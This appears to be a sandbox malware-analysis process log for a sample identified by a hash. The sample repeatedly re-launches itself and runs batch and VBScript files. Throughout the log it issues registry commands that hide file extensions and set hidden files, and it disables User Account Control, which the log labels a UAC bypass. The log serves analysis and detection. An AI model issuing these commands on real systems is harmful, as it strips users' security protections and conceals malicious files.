C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
176⤵
- Modifies visibility of file extensions in Explorer
PID:1208

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
176⤵
PID:1752

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
176⤵
- UAC bypass
PID:5780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vaoQMoEE.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
176⤵
PID:2720

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
177⤵
PID:1588

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
174⤵
- Modifies visibility of file extensions in Explorer
PID:3452

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
174⤵
PID:4512

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
174⤵
- UAC bypass
PID:3144

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LAwYUoAw.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
174⤵
PID:236

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
175⤵
PID:2320

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
172⤵
PID:1164

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
172⤵
PID:4424

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
172⤵
PID:5376

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xIMskkMs.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
172⤵
PID:6012

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
173⤵
PID:5160

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
170⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:3796

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
170⤵
PID:6076

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
170⤵
PID:3168

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TigUcMQA.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
170⤵
PID:4660

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
171⤵
PID:5500

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
168⤵
- Modifies visibility of file extensions in Explorer
PID:4728

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
168⤵
PID:5828

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
168⤵
- UAC bypass
PID:3460

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YgAYAoks.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
168⤵
PID:1520

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
169⤵
PID:5396

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
166⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:5676

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
166⤵
PID:3728

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
166⤵
PID:3888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QMoYUoYA.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
166⤵
PID:5444

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
167⤵
PID:5016

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
164⤵
PID:5700

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
164⤵
- Modifies registry key
PID:2248

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
164⤵
PID:1632

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OQYQMIIE.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
164⤵
PID:1088

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
165⤵
PID:5200

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
162⤵
PID:4844

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
162⤵
PID:5624

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
162⤵
PID:2540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\miQcwcIw.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
162⤵
PID:1460

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
163⤵
PID:5784

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
160⤵
PID:964

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
160⤵
PID:3348

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
160⤵
- UAC bypass
PID:3828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nywIosAE.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
160⤵
PID:5620

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
161⤵
PID:3904

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
158⤵
PID:1772

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
158⤵
- Modifies registry key
PID:3796

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
158⤵
- UAC bypass
PID:3528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fgEsEsUg.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
158⤵
PID:2448

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
159⤵
PID:2348

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
156⤵
PID:4320

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
156⤵
- Modifies registry key
PID:2152

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
156⤵
PID:668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\reUgoIUU.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
156⤵
PID:5404

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
157⤵
PID:6000

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
154⤵
PID:5548

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
154⤵
PID:4984

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
154⤵
PID:332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PAkQAYgU.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
154⤵
PID:3476

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
155⤵
PID:5532

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
152⤵
PID:2312

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
152⤵
PID:1116

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
152⤵
- UAC bypass
- Modifies registry key
PID:4700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ICwAossM.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
152⤵
PID:4608

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
153⤵
PID:1196

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
150⤵
PID:824

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
150⤵
PID:5972

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
150⤵
PID:1632

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cowwkEcI.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
150⤵
PID:3112

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
151⤵
PID:5724

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
148⤵
- Modifies visibility of file extensions in Explorer
PID:4724

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
148⤵
- Modifies registry key
PID:5784

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
148⤵
- UAC bypass
PID:3588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MAsUYkog.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
148⤵
PID:5852

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
149⤵
PID:2748

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
146⤵
PID:2128

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
146⤵
PID:2196

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
146⤵
- UAC bypass
PID:4744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EkEAMwMw.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
146⤵
PID:2584

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
147⤵
PID:3088

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
144⤵
- Modifies visibility of file extensions in Explorer
PID:5440

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
144⤵
PID:2752

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
144⤵
PID:3296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ViIgscUM.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
144⤵
PID:1100

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
145⤵
PID:5324

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
142⤵
PID:3244

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
142⤵
- Modifies registry key
PID:1172

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
142⤵
PID:5272

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BqosocIc.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
142⤵
PID:3348

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
143⤵
PID:756

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
140⤵
PID:3640

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
140⤵
PID:4728

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
140⤵
- UAC bypass
PID:656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hugUsMgs.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
140⤵
PID:2960

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
141⤵
PID:4092

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
138⤵
PID:3476

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
138⤵
- Modifies registry key
PID:1812

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
138⤵
PID:2772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jkIAggoI.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
138⤵
PID:2424

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
139⤵
PID:5484

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
136⤵
- Modifies visibility of file extensions in Explorer
PID:2344

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
136⤵
PID:1456

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
136⤵
PID:2312

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xmMcUsMY.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
136⤵
PID:3920

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
137⤵
PID:1844

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
134⤵
PID:1300

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
134⤵
PID:4792

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
134⤵
- UAC bypass
- Modifies registry key
PID:1836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qwgwAAMs.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
134⤵
PID:2804

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
135⤵
PID:1004

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
132⤵
- Modifies registry key
PID:4724

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
132⤵
PID:2204

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
132⤵
PID:5784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mmIUcIwk.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
132⤵
PID:1452

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
133⤵
PID:336

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
130⤵
- Modifies registry key
PID:1880

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
130⤵
PID:1568

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
130⤵
PID:3344

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SaEgAUkg.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
130⤵
PID:2188

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
131⤵
PID:3928

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
128⤵
- Modifies registry key
PID:5520

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
128⤵
PID:2348

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
128⤵
PID:2160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CWsUwcYM.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
128⤵
PID:5324

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
129⤵
PID:5040

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
126⤵
- Modifies visibility of file extensions in Explorer
PID:3528

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
126⤵
PID:1172

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
126⤵
- UAC bypass
PID:972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LqYoEkgk.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
126⤵
PID:3768

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
127⤵
PID:4348

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
124⤵
- Modifies visibility of file extensions in Explorer
PID:2960

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
124⤵
PID:2140

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
124⤵
PID:3056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hCgEoIcE.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
124⤵
PID:904

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
125⤵
PID:4736

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
122⤵
- Modifies visibility of file extensions in Explorer
PID:5028

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
122⤵
PID:5608

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
122⤵
PID:2772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\teowMAkc.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
122⤵
PID:4984

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
123⤵
PID:5532

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
120⤵
- Modifies visibility of file extensions in Explorer
PID:1028

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
120⤵
PID:3156

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
120⤵
- UAC bypass
PID:3444

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XigYMMYc.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
120⤵
PID:2812

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
121⤵
PID:5848

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
118⤵
PID:1040

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
118⤵
- Modifies registry key
PID:5488

C:\Windows\SysWOW64\reg.exe
